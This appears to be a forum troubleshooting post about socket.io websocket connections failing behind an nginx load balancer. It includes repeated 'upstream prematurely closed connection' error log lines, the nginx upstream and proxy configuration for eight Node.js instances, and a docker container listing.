2016/08/07 09:15:25 [error] 14070#14070: *7877071 upstream prematurely closed connection while reading response header from upstream, client: 223.24.40.131, server: chat.geek4it.com, request: "GET /socket.io/?transport=websocket&sid=Vc0WK_sK5E2OW_BKAJXF HTTP/1.1", upstream: "http://172.30.31.1:10007/socket.io/?transport=websocket&sid=Vc0WK_sK5E2OW_BKAJXF", host: "chat.geek4it.com:80"
2016/08/07 09:15:25 [error] 14070#14070: *7877071 upstream prematurely closed connection while reading response header from upstream, client: 223.24.40.131, server: chat.geek4it.com, request: "GET /socket.io/?transport=websocket&sid=Vc0WK_sK5E2OW_BKAJXF HTTP/1.1", upstream: "http://172.30.31.1:10003/socket.io/?transport=websocket&sid=Vc0WK_sK5E2OW_BKAJXF", host: "chat.geek4it.com:80"
2016/08/07 09:15:25 [error] 14070#14070: *7877071 upstream prematurely closed connection while reading response header from upstream, client: 223.24.40.131, server: chat.geek4it.com, request: "GET /socket.io/?transport=websocket&sid=Vc0WK_sK5E2OW_BKAJXF HTTP/1.1", upstream: "http://172.30.31.1:10002/socket.io/?transport=websocket&sid=Vc0WK_sK5E2OW_BKAJXF", host: "chat.geek4it.com:80"
2016/08/07 09:15:25 [error] 14070#14070: *7877071 upstream prematurely closed connection while reading response header from upstream, client: 223.24.40.131, server: chat.geek4it.com, request: "GET /socket.io/?transport=websocket&sid=Vc0WK_sK5E2OW_BKAJXF HTTP/1.1", upstream: "http://172.30.31.1:10001/socket.io/?transport=websocket&sid=Vc0WK_sK5E2OW_BKAJXF", host: "chat.geek4it.com:80"
2016/08/07 09:15:25 [error] 14070#14070: *7877071 upstream prematurely closed connection while reading response header from upstream, client: 223.24.40.131, server: chat.geek4it.com, request: "GET /socket.io/?transport=websocket&sid=Vc0WK_sK5E2OW_BKAJXF HTTP/1.1", upstream: "http://172.30.31.1:10006/socket.io/?transport=websocket&sid=Vc0WK_sK5E2OW_BKAJXF", host: "chat.geek4it.com:80"
2016/08/07 09:15:25 [error] 14070#14070: *7877071 upstream prematurely closed connection while reading response header from upstream, client: 223.24.40.131, server: chat.geek4it.com, request: "GET /socket.io/?transport=websocket&sid=Vc0WK_sK5E2OW_BKAJXF HTTP/1.1", upstream: "http://172.30.31.1:10008/socket.io/?transport=websocket&sid=Vc0WK_sK5E2OW_BKAJXF", host: "chat.geek4it.com:80"
2016/08/07 09:15:25 [error] 14070#14070: *7877071 upstream prematurely closed connection while reading response header from upstream, client: 223.24.40.131, server: chat.geek4it.com, request: "GET /socket.io/?transport=websocket&sid=Vc0WK_sK5E2OW_BKAJXF HTTP/1.1", upstream: "http://172.30.31.1:10005/socket.io/?transport=websocket&sid=Vc0WK_sK5E2OW_BKAJXF", host: "chat.geek4it.com:80"
2016/08/07 09:15:25 [error] 14070#14070: *7877071 upstream prematurely closed connection while reading response header from upstream, client: 223.24.40.131, server: chat.geek4it.com, request: "GET /socket.io/?transport=websocket&sid=Vc0WK_sK5E2OW_BKAJXF HTTP/1.1", upstream: "http://172.30.31.1:10004/socket.io/?transport=websocket&sid=Vc0WK_sK5E2OW_BKAJXF", host: "chat.geek4it.com:80"
2016/08/07 09:15:29 [error] 14069#14069: *7877292 upstream prematurely closed connection while reading response header from upstream, client: 125.25.177.189, server: chat.geek4it.com, request: "GET /socket.io/?EIO=3&sid=QPdEtaKYseDpI2HkAJrB&transport=websocket HTTP/1.1", upstream: "http://172.30.31.1:10008/socket.io/?EIO=3&sid=QPdEtaKYseDpI2HkAJrB&transport=websocket", host: "chat.geek4it.com"
2016/08/07 09:15:29 [error] 14069#14069: *7877292 upstream prematurely closed connection while reading response header from upstream, client: 125.25.177.189, server: chat.geek4it.com, request: "GET /socket.io/?EIO=3&sid=QPdEtaKYseDpI2HkAJrB&transport=websocket HTTP/1.1", upstream: "http://172.30.31.1:10002/socket.io/?EIO=3&sid=QPdEtaKYseDpI2HkAJrB&transport=websocket", host: "chat.geek4it.com"
2016/08/07 09:15:29 [error] 14069#14069: *7877292 upstream prematurely closed connection while reading response header from upstream, client: 125.25.177.189, server: chat.geek4it.com, request: "GET /socket.io/?EIO=3&sid=QPdEtaKYseDpI2HkAJrB&transport=websocket HTTP/1.1", upstream: "http://172.30.31.1:10003/socket.io/?EIO=3&sid=QPdEtaKYseDpI2HkAJrB&transport=websocket", host: "chat.geek4it.com"
2016/08/07 09:15:29 [error] 14069#14069: *7877292 upstream prematurely closed connection while reading response header from upstream, client: 125.25.177.189, server: chat.geek4it.com, request: "GET /socket.io/?EIO=3&sid=QPdEtaKYseDpI2HkAJrB&transport=websocket HTTP/1.1", upstream: "http://172.30.31.1:10006/socket.io/?EIO=3&sid=QPdEtaKYseDpI2HkAJrB&transport=websocket", host: "chat.geek4it.com"
Server: Socket.io
Android: socket.io-client-java
iOS: Socket.IO-Client-Swift
Server: AWS EC2
Nginx: nginx/1.11.3
Server 1: Nginx
Server 2: 8 socket.io instance written with Node.js (Running with docker container)
Server 1:
Nginx Config:
upstream chatroom_nodes {
    ip_hash;
    server 172.30.31.1:10001 weight=10 max_fails=3 fail_timeout=30s;
    server 172.30.31.1:10002 weight=10 max_fails=3 fail_timeout=30s;
    server 172.30.31.1:10003 weight=10 max_fails=3 fail_timeout=30s;
    server 172.30.31.1:10004 weight=10 max_fails=3 fail_timeout=30s;
    server 172.30.31.1:10005 weight=10 max_fails=3 fail_timeout=30s;
    server 172.30.31.1:10006 weight=10 max_fails=3 fail_timeout=30s;
    server 172.30.31.1:10007 weight=10 max_fails=3 fail_timeout=30s;
    server 172.30.31.1:10008 weight=10 max_fails=3 fail_timeout=30s;
}
server {
    listen 80;
    server_name test.geek4it.com;
    access_log /var/log/nginx/geek4it/access.log main;
    error_log /var/log/nginx/geek4it/error.log warn;
    location / {
        proxy_set_header Upgrade $http_upgrade;
        proxy_set_header Connection "upgrade";
        proxy_http_version 1.1;
        proxy_set_header X-Forwarded-For $proxy_add_x_forwarded_for;
        proxy_set_header Host $host;
        proxy_pass http://chatroom_nodes;
        proxy_redirect off;
        proxy_buffers 8 24k;
        proxy_buffer_size 2k;
    }
}
Server 2:
CONTAINER ID IMAGE COMMAND CREATED STATUS PORTS NAMES
5e4651be48b5 registry.geek4it.com:5000/chat-runtime:130 "/bin/bash /opt/chatr" 26 hours ago Up 25 hours 0.0.0.0:10004->3000/tcp chatroom-4_1
6fedbde6383e registry.geek4it.com:5000/chat-runtime:130 "/bin/bash /opt/chatr" 26 hours ago Up 25 hours 0.0.0.0:10005->3000/tcp chatroom-5_1
129e8ae422be registry.geek4it.com:5000/chat-runtime:130 "/bin/bash /opt/chatr" 26 hours ago Up 25 hours 0.0.0.0:10002->3000/tcp chatroom-2_1
857d03c18649 registry.geek4it.com:5000/chat-runtime:130 "/bin/bash /opt/chatr" 26 hours ago Up 25 hours 0.0.0.0:10008->3000/tcp chatroom-8_1
625dc44e81ef registry.geek4it.com:5000/chat-runtime:130 "/bin/bash /opt/chatr" 26 hours ago Up 25 hours 0.0.0.0:10000->3000/tcp chatroom-0_1
b99334904496 registry.geek4it.com:5000/chat-runtime:130 "/bin/bash /opt/chatr" 26 hours ago Up 25 hours 0.0.0.0:10006->3000/tcp chatroom-6_1
ea648a3913d6 registry.geek4it.com:5000/chat-runtime:130 "/bin/bash /opt/chatr" 26 hours ago Up 25 hours 0.0.0.0:10007->3000/tcp chatroom-7_1
4a8884303dbc registry.geek4it.com:5000/chat-runtime:130 "/bin/bash /opt/chatr" 26 hours ago Up 24 hours 0.0.0.0:10001->3000/tcp chatroom-1_1
d83e11a1fca5 registry.geek4it.com:5000/chat-runtime:130 "/bin/bash /opt/chatr" 26 hours ago Up 24 hours 0.0.0.0:10003->3000/tcp chatroom-3_1
PS: I use the http protocol like: http://xxxxx to connect to the server.